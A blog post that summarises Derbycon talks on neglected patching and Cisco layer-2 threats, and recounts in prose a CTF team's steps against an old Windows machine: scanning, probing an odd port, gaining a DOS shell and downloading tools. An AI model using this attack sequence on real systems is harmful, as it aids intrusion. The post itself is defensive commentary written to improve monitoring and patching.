Worried About 0Day Attacks? Take Care of 30day first!

I have been watching the Derbycon videos (put up by IronGeek) and I like Paul Coggin’s comment: Are you worried about Day zero attacks? You have to take care of 80 day first.

I have heard Paul’s talks before and this one in Derbycon is a bit different, but the theme is the same – do not forget the lvl2 OSI exploits and threats. This means that the Cisco devices can be attacked if not configured properly. This is obvious to him as he is the pentester versus Cisco routers.

Kind of funny as Paul says(as a side note) : “many companies are worried about Zero Day attacks but have not solved the 80 day attack”.

It is a valid point Paul, if we do not have our patching process set up correctly we are not catching the 80 day old vulnerability not to even mention the Zero-day(we can’t catch that one) but important to note we should not focus on the Zero-day vulnerability since there is nothing to do about them.

Derbycon had a CTF (capture the flag) competition as well which means there was a contest that had a real life hackers riddle … and solution that shows you some of the thought processes when a hacker makes on a take over of a machine.

At Derbycon’s CTF event the test hack uses the same process as a criminal hacker would in the real world

“Hacker Process”: also called a Kill Chain – Recon – Analysis – Penetrate – Control we like to call it SVAPE&C.

Walking through the thought processes of the Hacker as they are performing their actions is important to design better defenses.

The red team (attackers) versus the blue team (defense) is the constant in the world of Computer security, so therefore there are these contests of CTF.

I don’t want to get into too many details, but a few are necessary:

In a capture the flag contest there is a lot of network traffic that the hacker (red team) has to digest and make sense of. Decide what traffic is useful and what system to review closer.

System HELPDESK was found(with wireshark trafficsniffing) and it had ports 139 /tcp and 3456/tcp open (means Microsoft share ports) with nmap scanner

Then a nbtscan was done to find out more information from the system

Then a ping was done – which also gives out information

the port 139 was Microsoft

Port 3456 was odd so ncat was run to probe the port

Here the CTF oddities response came just like the “War games ” movie in the 90’s “WOULD YOU LIKE TO PLAY A GAME?”

From here the hack is now in a different stage having done reconnaissance and found the system and ports open.

So as you see in the Tweet the next point was to give a programmatic response to the port 3456 (even the port number is funny as there is no port service with that name. As a hacker participating in the ctf once you saw that tweet now you know what to answer the question.

The issue now was how to penetrate the box.

The str$() response did not work correctly

Hackers do what they do – and “hack” i.e. try different things until succeeding

Through some tricks they were able to start a command.com dos command (after realizing this may be an old machine and the new hack tools do not work)

Once the hacker can execute commands on the remote system what happens next? It is the “control” piece.

Now the hacker downloads hacking tools needed to truly control the machine. (ncat and registry program)

From there they had to find the FlagMalwareBytes registry flag in the time allotted.

This particular team placed 3rd.

There is more to the CTF event but at this point I want to discuss the general nature of hacking. It is true in this case the hacker was trying to control an ancient machine (windows98 or 95 even) but the principles are the same. In fact due to the nature of the old machines the hackers had to use older tools.

The one thing that we need to take as a lesson (no matter the system) is that most attack hacks try to download tools and other items to the system to be compromised. And it usually will be with manual commands ftp or wget.

So if you can review any manual tool commands running in your network that would be good. Patching the local systems from all vulnerabilities gives you more defense against wily hackers.